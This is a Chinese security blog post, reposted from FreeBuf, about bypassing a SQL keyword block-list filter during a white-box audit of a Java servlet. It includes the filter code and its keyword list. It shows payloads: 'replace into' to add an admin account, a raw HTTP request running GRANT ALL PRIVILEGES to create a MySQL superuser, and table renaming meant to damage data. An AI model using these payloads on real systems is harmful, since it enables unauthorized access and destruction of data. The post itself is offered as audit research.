浅析白盒白名单SQL注入绕过利用

admin
admin
admin
142105
文章
117
评论
2023年8月9日20:20:19评论43 views字数 1953阅读6分30秒阅读模式

浅析白盒白名单SQL注入绕过利用

前 言

看到标题的第一反应,大家可能感觉本文讲的是一些老套数,比如select/*xasdasdsa*/等等垃圾字符绕过,在平时代码审计项目中,遇到了很多白名单过滤,现实情况就是,根本不允许使用特定语句和方法,比如一些存在注入的代码中,明明有注入但是碰到了白名单过滤。洞就送在眼前了,只需要变通一下,就可以成为一个新的洞了。

代码审计

这里根据以往审计过程,过滤的代码。自己重现了一下。

如下是Filter过滤,在本文中,我过滤掉了增删改查等关键字。因为在注入中多数都是靠这几个函数来玩。

public class SQLFilter implements Filter {@Overridepublic void init(FilterConfig filterConfig) throws ServletException {Filter.super.init(filterConfig);}@Overridepublic void destroy() {Filter.super.destroy();}@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
String sql = servletRequest.getParameter("sql");System.out.println(sql);if (StrUtil.containsAnyIgnoreCase(sql, new CharSequence[]{"INSERT ", "SELECT ", "UPDATE ", "DELETE ", "DROP ", "ALTER ", "TRUNCATE ","/**/"})) {System.out.println("拦截到恶意SQL"+sql);servletResponse.getWriter().write("Error:"+sql);return;}
filterChain.doFilter(servletRequest,servletResponse);
}}

Controller层写的很简单,只是接收并直接执行SQL

浅析白盒白名单SQL注入绕过利用

针对Filter的分析,其实可以发现过滤了增删改查这些操作。

浅析白盒白名单SQL注入绕过利用

浅析白盒白名单SQL注入绕过利用

拦截情况

浅析白盒白名单SQL注入绕过利用

遇到这种情况,也就没有深究了,而是把思路转换到了其它函数上。可能和红队思路不同,红队希望能绕过利用,而白盒可能是为了造成危害即可水一个洞。

利用

3.1 replace into函数

浅析白盒白名单SQL注入绕过利用

这个函数类似于insert 可以添加数据,在白盒中,我们肯定提前是知道mysql库和表结构的,比如此注入在前台中,就可以使用replace into来对管理员表中添加一个新增账号,这样就可以登录后台进行更多获取权限的操作了。

浅析白盒白名单SQL注入绕过利用

这里直接可以使用replace为表添加数据

浅析白盒白名单SQL注入绕过利用

浅析白盒白名单SQL注入绕过利用

3.2 添加Mysql用户

这里直接可以添加一个用户,账号Met32 密码 password

但是好像有权限或者版本问题,并不是百试百灵。如果在数据库port可以外连的情况,可以试一下

POST /SqlExecute HTTP/1.1Host: 192.168.0.106:8987User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 97
sql=GRANT+ALL+PRIVILEGES+ON+*.*+TO+'Met32'@'localhost'+IDENTIFIED+BY+'password'WITH+GRANT+OPTION;

浅析白盒白名单SQL注入绕过利用

浅析白盒白名单SQL注入绕过利用

3.3 rename重命名

这就是纯纯搞破坏水洞了,黑盒不建议使用,本地白盒自己搭建的项目可以水一下

浅析白盒白名单SQL注入绕过利用

浅析白盒白名单SQL注入绕过利用

总体说也算个洞,就是水洞...

尾 述

多去查一些冷门的函数,在一些开发都不知道的函数中,很可能有利用的情况。

原文始发于微信公众号(FreeBuf):浅析白盒白名单SQL注入绕过利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月9日20:20:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   浅析白盒白名单SQL注入绕过利用https://cn-sec.com/archives/1944883.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息